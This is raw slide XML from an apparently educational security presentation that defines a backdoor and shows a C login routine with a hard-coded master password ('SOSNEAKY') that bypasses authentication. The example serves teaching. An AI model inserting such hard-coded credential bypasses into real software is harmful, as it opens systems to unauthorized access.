            <a:xfrm>
              <a:off x="1452" y="2352"/>
              <a:ext cx="16560" cy="5131"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FEF8F6"/>
            </a:solidFill>
            <a:ln w="1905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4" name="任意多边形 3"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1719" y="2310"/>
              <a:ext cx="15922" cy="4885"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 7740"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 3770"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 7740"/>
                <a:gd name="connsiteY1" fmla="*/ 3770 h 3770"/>
                <a:gd name="connsiteX2" fmla="*/ 7740 w 7740"/>
                <a:gd name="connsiteY2" fmla="*/ 3770 h 3770"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7740" h="3770">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="3770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7740" y="3770"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="15875">
              <a:solidFill>
                <a:srgbClr val="FEBF7A"/>
              </a:solidFill>
              <a:prstDash val="sysDash"/>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6" name="椭圆 5"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1334" y="2137"/>
              <a:ext cx="751" cy="629"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FED65A"/>
            </a:solidFill>
            <a:ln w="1270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8" name="任意多边形 7"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1188" y="2481"/>
              <a:ext cx="1042" cy="38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944" h="421">
                  <a:moveTo>
                    <a:pt x="460" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="497" y="0"/>
                    <a:pt x="530" y="17"/>
                    <a:pt x="552" y="44"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="553" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="41"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="581" y="16"/>
                    <a:pt x="616" y="0"/>
                    <a:pt x="655" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="708" y="0"/>
                    <a:pt x="754" y="30"/>
                    <a:pt x="778" y="73"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="779" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="799" y="69"/>
                    <a:pt x="811" y="67"/>
                    <a:pt x="824" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="890" y="67"/>
                    <a:pt x="944" y="121"/>
                    <a:pt x="944" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="944" y="254"/>
                    <a:pt x="890" y="308"/>
                    <a:pt x="824" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="809" y="308"/>
                    <a:pt x="796" y="306"/>
                    <a:pt x="783" y="301"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="773" y="297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="772" y="300"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="753" y="344"/>
                    <a:pt x="710" y="374"/>
                    <a:pt x="661" y="374"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="623" y="374"/>
                    <a:pt x="590" y="357"/>
                    <a:pt x="568" y="330"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="562" y="322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558" y="328"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="534" y="367"/>
                    <a:pt x="490" y="393"/>
                    <a:pt x="440" y="393"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="397" y="393"/>
                    <a:pt x="358" y="373"/>
                    <a:pt x="332" y="342"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="332" y="342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330" y="345"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="313" y="390"/>
                    <a:pt x="269" y="421"/>
                    <a:pt x="219" y="421"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="421"/>
                    <a:pt x="98" y="367"/>
                    <a:pt x="98" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="292"/>
                    <a:pt x="99" y="284"/>
                    <a:pt x="100" y="276"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="103" y="266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="265"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="253"/>
                    <a:pt x="0" y="205"/>
                    <a:pt x="0" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="80"/>
                    <a:pt x="54" y="26"/>
                    <a:pt x="121" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="26"/>
                    <a:pt x="206" y="51"/>
                    <a:pt x="226" y="89"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="228" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234" y="88"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="75"/>
                    <a:pt x="277" y="67"/>
                    <a:pt x="302" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="67"/>
                    <a:pt x="326" y="69"/>
                    <a:pt x="337" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="348" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348" y="74"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="30"/>
                    <a:pt x="410" y="0"/>
                    <a:pt x="460" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700">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nvGrpSpPr>
            <p:cNvPr id="40" name="组合 39"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16227" y="7047"/>
              <a:ext cx="429" cy="359"/>
              <a:chOff x="13803" y="6625"/>
              <a:chExt cx="938" cy="938"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="任意多边形 9"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>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39" name="任意多边形 38"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId6"/>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="41" name="组合 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="17333" y="7047"/>
              <a:ext cx="429" cy="359"/>
              <a:chOff x="13803" y="6625"/>
              <a:chExt cx="938" cy="938"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="任意多边形 41"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId7"/>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3" name="任意多边形 42"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId8"/>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="44" name="组合 43"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16780" y="7047"/>
              <a:ext cx="429" cy="359"/>
              <a:chOff x="13803" y="6625"/>
              <a:chExt cx="938" cy="938"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="45" name="任意多边形 44"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13803" y="6625"/>
                <a:ext cx="939" cy="939"/>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D65A"/>
              </a:solidFill>
              <a:ln w="3175">
                <a:solidFill>
                  <a:srgbClr val="E4374B"/>
                </a:solid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sp>
            <p:nvSpPr>
              <p:cNvPr id="47" name="任意多边形 46"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId10"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="14072" y="6894"/>
                <a:ext cx="400" cy="400"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="idx" fmla="cos wd2 2700000"/>
                  <a:gd name="idy" fmla="sin hd2 2700000"/>
                  <a:gd name="il" fmla="+- hc 0 idx"/>
                  <a:gd name="ir" fmla="+- hc idx 0"/>
                  <a:gd name="it" fmla="+- vc 0 idy"/>
                  <a:gd name="ib" fmla="+- vc idy 0"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="3">
                    <a:pos x="hc" y="t"/>
                  </a:cxn>
                  <a:cxn ang="3">
                    <a:pos x="il" y="it"/>
                  </a:cxn>
                  <a:cxn ang="cd2">
                    <a:pos x="l" y="vc"/>
                  </a:cxn>
                  <a:cxn ang="cd4">
                    <a:pos x="il" y="ib"/>
                  </a:cxn>
                  <a:cxn ang="cd4">
                    <a:pos x="hc" y="b"/>
                  </a:cxn>
                  <a:cxn ang="cd4">
                    <a:pos x="ir" y="ib"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="r" y="vc"/>
                  </a:cxn>
                  <a:cxn ang="3">
                    <a:pos x="ir" y="it"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1028" h="1025">
                    <a:moveTo>
                      <a:pt x="533" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="619" y="0"/>
                      <a:pt x="690" y="71"/>
                      <a:pt x="690" y="158"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="690" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="151"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="725" y="134"/>
                      <a:pt x="755" y="124"/>
                      <a:pt x="788" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="874" y="124"/>
                      <a:pt x="945" y="195"/>
                      <a:pt x="945" y="282"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="325"/>
                      <a:pt x="927" y="364"/>
                      <a:pt x="899" y="393"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="895" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="902" y="398"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="974" y="413"/>
                      <a:pt x="1028" y="476"/>
                      <a:pt x="1028" y="553"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1028" y="637"/>
                      <a:pt x="962" y="706"/>
                      <a:pt x="879" y="710"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="876" y="710"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="712"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="890" y="735"/>
                      <a:pt x="897" y="760"/>
                      <a:pt x="897" y="788"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="897" y="874"/>
                      <a:pt x="826" y="945"/>
                      <a:pt x="740" y="945"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="696" y="945"/>
                      <a:pt x="657" y="927"/>
                      <a:pt x="628" y="899"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="627" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="612" y="971"/>
                      <a:pt x="549" y="1025"/>
                      <a:pt x="473" y="1025"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="386" y="1025"/>
                      <a:pt x="315" y="954"/>
                      <a:pt x="315" y="868"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="315" y="865"/>
                      <a:pt x="315" y="862"/>
                      <a:pt x="315" y="859"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="316" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="860"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="280" y="877"/>
                      <a:pt x="250" y="887"/>
                      <a:pt x="218" y="887"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="887"/>
                      <a:pt x="60" y="816"/>
                      <a:pt x="60" y="730"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="691"/>
                      <a:pt x="73" y="657"/>
                      <a:pt x="96" y="629"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="104" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="618"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="594"/>
                      <a:pt x="0" y="538"/>
                      <a:pt x="0" y="473"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="402"/>
                      <a:pt x="47" y="342"/>
                      <a:pt x="111" y="322"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="124" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="317"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="294"/>
                      <a:pt x="104" y="269"/>
                      <a:pt x="104" y="242"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="155"/>
                      <a:pt x="175" y="84"/>
                      <a:pt x="262" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="305" y="84"/>
                      <a:pt x="344" y="102"/>
                      <a:pt x="373" y="130"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="377" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="134"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="388" y="58"/>
                      <a:pt x="454" y="0"/>
                      <a:pt x="533" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FEC928"/>
              </a:solidFill>
              <a:ln w="0">
                <a:noFill/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="2">
                <a:srgbClr val="005CA2">
                  <a:shade val="50000"/>
                </a:srgbClr>
              </a:lnRef>
              <a:fillRef idx="1">
                <a:srgbClr val="005CA2"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:srgbClr val="005CA2"/>
              </a:effectRef>
              <a:fontRef idx="minor">
                <a:sysClr val="window" lastClr="FFFFFF"/>
              </a:fontRef>
            </p:style>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="220" name="Text Box 8" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313437387d222c0a20202020227461726765744964223a202270726f636573734f6e6c696e6542756c6c6574220a7d0a"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1719" y="3352"/>
              <a:ext cx="16292" cy="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457200" indent="-457200">
                <a:lnSpc>
                  <a:spcPts val="4000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="1000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="p"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                </a:rPr>
                <a:t>A backdoor is a hidden means of accessing a computer system or encrypted data that bypasses normal authentication and security measures. It can be </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                </a:rPr>
                <a:t>intentionally added by manufacturers or attackers for malicious purposes.</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6393815"/>
            <a:ext cx="12364085" cy="610235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="内容占位符 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975360" y="318770"/>
            <a:ext cx="1120648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Example</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="32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3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="888365" y="962025"/>
            <a:ext cx="5386070" cy="5492750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="07A7AF">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="07A7AF"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>char *sneaky = "SOSNEAKY";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authenticate(char *username, char *password)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char stored_pw[9];</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stored_pw[8] = 0;</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int pwfile;</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 evil back d00r</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>if (strcmp(password, sneaky) == 0) return 1;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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pwfile = open(username, O_RDONLY);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read(pwfile, stored_pw, 8);</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if (strcmp(password, stored_pw) == 0) return 1;</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return 0;</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accepted()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printf("Welcome to the admin console, trusted user!\n");</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int rejected()</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printf("Go away!");</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	exit(1);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6854190" y="1123315"/>
            <a:ext cx="4450715" cy="5169535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>int main(int argc, char **argv)</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char username[9];</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char password[9];</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int authed;</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username[8] = 0;</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password[8] = 0;</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puts("Username: \n");</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username, 8);</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&amp;authed, 1);</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puts("Password: \n");</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password, 8);</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read(0, &amp;authed, 1);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pP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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>authed = authenticate(username, password);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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if (authed) accepted();</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	else rejected();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>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9"/>
          <p:cNvSpPr txBox="1"/>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chemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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chemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-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rPr>
              <a:t>Damages</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="07A7AF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Box 8" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030352c5c2274656d706c61746549645c223a32303233313534347d222c0a20202020227461726765744964223a202270726f636573734f6e6c696e6542756c6c6574220a7d0a"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="236220" y="1098550"/>
            <a:ext cx="11828780" cy="10204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533400">
              <a:lnSpc>
                <a:spcPts val="3800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="150000"/>
